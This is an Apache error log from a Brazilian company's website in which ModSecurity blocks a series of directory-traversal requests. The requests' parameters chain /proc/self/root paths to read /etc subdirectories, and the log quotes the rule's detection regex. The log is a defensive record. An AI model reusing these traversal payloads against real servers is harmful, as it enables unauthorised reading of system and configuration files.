[Tue Mar 17 14:08:32.608101 2026] [:error] [pid 9299:tid 140411565680384] [client 74.7.243.128:60026] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKj7-sgTmmJoPuMdy2qAAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Tue Mar 17 14:08:53.130219 2026] [proxy_fcgi:error] [pid 9299:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57864] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:08:56.154569 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.241.31:56780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKqAeiSKl8TjouI-YZzgAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:08:59.202552 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.241.31:56780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKqweiSKl8TjouI-YZ0QAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:03.479005 2026] [:error] [pid 7004:tid 140411616036608] [client 74.7.241.31:43720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKrsU6Sx0TG1YjmQiuyAAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:04.755366 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.241.31:43728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKsNY0UrI5A3LftIz7vAAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:07.556124 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.241.31:43742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKs9Y0UrI5A3LftIz7vgAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:09.215003 2026] [:error] [pid 6296:tid 140411666392832] [client 74.7.241.31:41832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKtXIk7brgkOH-rIWMJgAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:16.393833 2026] [proxy_fcgi:error] [pid 29826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58610] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:09:18.568800 2026] [:error] [pid 9299:tid 140411699963648] [client 74.7.241.31:52380] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKvr-sgTmmJoPuMdy2uQAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:20.256343 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.241.31:52392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKwBj0p0SRWAqcjGF5ygAAAwc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:21.696507 2026] [:error] [pid 29826:tid 140411574073088] [client 74.7.241.31:52398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKwRltFzTUElcKTdKzRAAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:25.840878 2026] [:error] [pid 28243:tid 140411658000128] [client 74.7.241.31:52412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKxQ9EzQ9w6IvBX0sUfQAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:27.599228 2026] [:error] [pid 29359:tid 140411641214720] [client 74.7.241.31:50240] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKx6Sy22zYCMGxsIlc3wAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:30.213082 2026] [:error] [pid 9299:tid 140411699963648] [client 74.7.241.31:50242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmKyr-sgTmmJoPuMdy2vAAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:38.821841 2026] [proxy_fcgi:error] [pid 7004:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59372] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:09:40.162310 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.241.31:55904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmK1KBJNF7axNlVR0UXEAAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:42.558785 2026] [:error] [pid 30223:tid 140411716749056] [client 74.7.241.31:55914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmK1cT4LuLykoMK_89otAAAA4M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:47.994746 2026] [:error] [pid 28879:tid 140411699963648] [client 74.7.241.31:55928] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmK21DN3UhJjLukrK-LlgAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:49.865507 2026] [:error] [pid 9299:tid 140411649607424] [client 74.7.241.31:43574] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmK3b-sgTmmJoPuMdy2vgAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:51.300979 2026] [:error] [pid 30223:tid 140411725141760] [client 74.7.241.31:43588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmK38T4LuLykoMK_89ouQAAA4I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:52.792254 2026] [:error] [pid 9299:tid 140411574073088] [client 74.7.241.31:43596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmK4L-sgTmmJoPuMdy2wAAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:09:57.492562 2026] [:error] [pid 7004:tid 140411741927168] [client 74.7.241.31:35920] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmK5cU6Sx0TG1YjmQiu7wAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:10:01.137783 2026] [proxy_fcgi:error] [pid 29826:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60320] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:10:01.229458 2026] [:error] [pid 17965:tid 140411725141760] [client 74.7.241.31:35936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmK6at8Nd0UC_OcbVHLTgAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
